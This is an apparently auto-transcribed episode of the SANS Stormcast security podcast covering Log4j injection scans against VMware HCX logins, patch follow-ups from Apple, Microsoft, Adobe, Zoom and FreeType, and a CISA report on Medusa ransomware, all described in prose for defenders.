Hello and welcome to the Thursday, March 13th, 2025
edition of the SANS Internet Storm Center's Stormcast. My
name is Johannes Ullrich and today I'm recording from
Jacksonville, Florida. One more mobility that's just not
going away is Log4j. The latest example are some scans
that I observed today against the VMware Hyper Cloud
Extension or HCX API. This is a REST API and at first I
thought it was just a brute force attempt I saw because
the endpoint that the request was directed at, well, was
used for login. It's the session and you just post a
username and password to it and you'll get back a session
key that's then being used as a bearer token. However,
looking at the payload closer, well, the username was
actually a log4j payload. This makes perfect sense, sort of
in hindsight, that an attacker would use a username to inject
a log4j payload because, well, that's the part that's usually
logged from a request like this. And interestingly, the
IP that was going after these VMware systems also went after
a couple other login pages like some Cisco login pages
and others that I yet have to identify. They're sort of just
generic, like some just login. So it could be various
applications that are being attacked here. And then we got
a little bit of Patch Tuesday cleanup. First of all, the
Apple update released yesterday that fixed the
server day vulnerability in macOS and iOS. Apparently,
after applying this update, some users reported that Apple
intelligence is being reenabled. If they had it
disabled first, that's Apple's artificial intelligence
feature that typically is enabled by default, but you
are able to disable it. Well, in Europe, I don't think it's
available. So no issue with Europe here. This has been an
issue in the last update as well. So nothing really
terribly new here. Just be aware. And if you want it
disabled, double check that it's still disabled. Nothing
yet. I heard about yesterday's Microsoft update, but there
are some reports that actually January update does cause some
issues with USB printers. And it does cause them to print
gibberish. If you're affected by this, I'll have a link to a
statement from Microsoft here in the show notes. And
yesterday when I was recording, Adobe had not
released its Patch Tuesday update yet. Well, they have
been released now. They updated a total of seven
different applications. The one that's noteworthy here is
Acrobat Reader. Of course, that's an old favorite when it
comes to patching. And it fixes a number of critical
remote code execution vulnerabilities. So definitely
something that you need to apply if you're running Adobe
Acrobat Reader. And CISA, in conjunction with some partner
agencies, did publish a report about the Medusa malware. This
is a ransomware. I'm always looking first for sort of
initial access. In this case, it appears to be phishing. Of
course, still very common. Screen connect. We talked
about this before. And then the Fortinet EMS SQL injection
vulnerability. Another sort of interesting TTP here I find is
that they see it do some port scans internally. That's
something that should sort of pop up in any kind of internal
sensor. In particular, some of the odd ports they're
scanning, like 3050, the Firebird database port, which
isn't used much. So having all of a sudden lots of SYN scans
on this port should be something that could trigger
an alert. Other than that, a great read as usual. These
reports are very useful to, first of all, make sure that
you have blocked some of these initial access vectors as much
as possible. That you have set up detection for the lateral
movement, like these port scans. And then, of course,
also just to check if you're not already infected. There
are a number of IOCs and such listed in the report. And then
let's look at some other patches. We got, first of all,
Zoom released an update, fixing five vulnerabilities.
Four of them are rated as high, meaning they lead to
remote code execution, buffer overflows, buffer underflow,
use after three. Sort of your standard vulnerabilities here.
Updated. I find Zoom is pretty good in sort of keeping itself
updated. So it shouldn't be a big issue. And then we got an
update for the free type library. This is one of those
font rendering libraries. Plenty of past vulnerabilities
in libraries like this. This could lead to remote code
execution. Problem with all these libraries is that,
number one, they're everywhere. So you'll have to
wait for things like browsers and other display software to
be updated. Secondly, there are a lot of fonts being
loaded sort of dynamically these days. And that's how a
vulnerability like this could possibly be exploited. Well,
and this is it again for today. Thanks for subscribing.
Thanks for leaving good reviews. Thanks for telling
everybody, friends and enemies, how great this
podcast is. And get them to subscribe to it as well.
Thanks and talk to you again tomorrow. Bye
